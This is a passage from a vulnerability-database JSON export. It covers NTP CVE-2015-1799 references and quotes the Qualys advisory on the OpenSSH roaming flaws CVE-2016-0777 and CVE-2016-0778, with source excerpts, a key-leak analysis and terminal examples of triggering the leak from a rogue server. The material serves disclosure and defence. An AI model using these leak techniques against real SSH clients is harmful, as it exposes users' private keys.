"https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/04/09/ntp_vulns/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/04/09/cisco_security_software_needs_security_patch/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-17", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.kb.cert.org/vuls/id/374268" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 1.9, "url": "http://bugs.ntp.org/show_bug.cgi?id=2781" }, { "trust": 1.5, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38275" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150408-ntpd" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2567-1" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032031" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:202" }, { "trust": 1.1, "url": "http://listengine.tuxfamily.org/chrony.tuxfamily.org/chrony-announce/2015/04/msg00002.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3222" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3223" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/73950" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-april/155863.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10114" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-04/msg00052.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-april/155864.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "trust": 1.1, "url": "http://support.apple.com/kb/ht204942" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=145750740530849\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143213867103400\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201509-01" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1799" }, { "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2779" }, { "trust": 0.8, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynoticehttp://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95993136/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-1799" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1799" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1798" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory3.asc" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2015-1799" }, { "trust": 0.3, "url": "http://www.ntp.org" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/apr/156" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679309" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022831" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp4_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966578" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975967" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000111" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2015-006-symmetric-key-ntp/?q=cve-2015-1798\u0026l=en_us\u0026fs=search\u0026pn=1" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-1799" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1798" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/17.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2567-1/" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.3" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2231.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9298" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9751" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1798" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9298" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3673" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8141" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3672" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8127" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3661" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3671" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1741" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8128" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8130" }, { "trust": 0.1, "url": "https://support.apple.com/en-" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8139" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3662" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8129" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1157" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204950" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3663" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3668" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3666" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3667" } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "BID", "id": "73950" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "136119" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "131396" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "BID", "id": "73950" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "136119" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "131396" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-07T00:00:00", "db": "CERT/CC", "id": "VU#374268" }, { "date": "2015-04-08T00:00:00", "db": "VULMON", "id": "CVE-2015-1799" }, { "date": "2015-04-07T00:00:00", "db": "BID", "id": "73950" }, { "date": "2015-04-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "date": "2015-04-22T20:14:29", "db": "PACKETSTORM", "id": "131582" }, { "date": "2015-05-20T23:06:21", "db": "PACKETSTORM", "id": "131941" }, { "date": "2016-03-08T10:18:00", "db": "PACKETSTORM", "id": "136119" }, { "date": "2015-04-13T14:03:24", "db": "PACKETSTORM", "id": "131385" }, { "date": "2015-04-14T18:53:39", "db": "PACKETSTORM", "id": "131405" }, { "date": "2015-11-20T00:42:01", "db": "PACKETSTORM", "id": "134448" }, { "date": "2015-04-13T14:05:55", "db": "PACKETSTORM", "id": "131396" }, { "date": "2015-07-01T05:31:53", "db": "PACKETSTORM", "id": "132518" }, { "date": "2015-04-08T10:59:05.717000", "db": "NVD", "id": "CVE-2015-1799" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-10T00:00:00", "db": "CERT/CC", "id": "VU#374268" }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2015-1799" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "73950" }, { "date": "2015-07-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "date": "2018-01-05T02:30:00.447000", "db": "NVD", "id": "CVE-2015-1799" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "73950" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project ntpd reference implementation contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#374268" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "73950" } ], "trust": 0.3 } }
var-201601-0030
Vulnerability from variot
The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================ Ubuntu Security Notice USN-2869-1 January 14, 2016
openssh vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
OpenSSH could be made to expose sensitive information over the network.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: openssh-client 1:6.9p1-2ubuntu0.1
Ubuntu 15.04: openssh-client 1:6.7p1-5ubuntu1.4
Ubuntu 14.04 LTS: openssh-client 1:6.6p1-2ubuntu2.4
Ubuntu 12.04 LTS: openssh-client 1:5.9p1-5ubuntu1.8
In general, a standard system update will make all the necessary changes. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
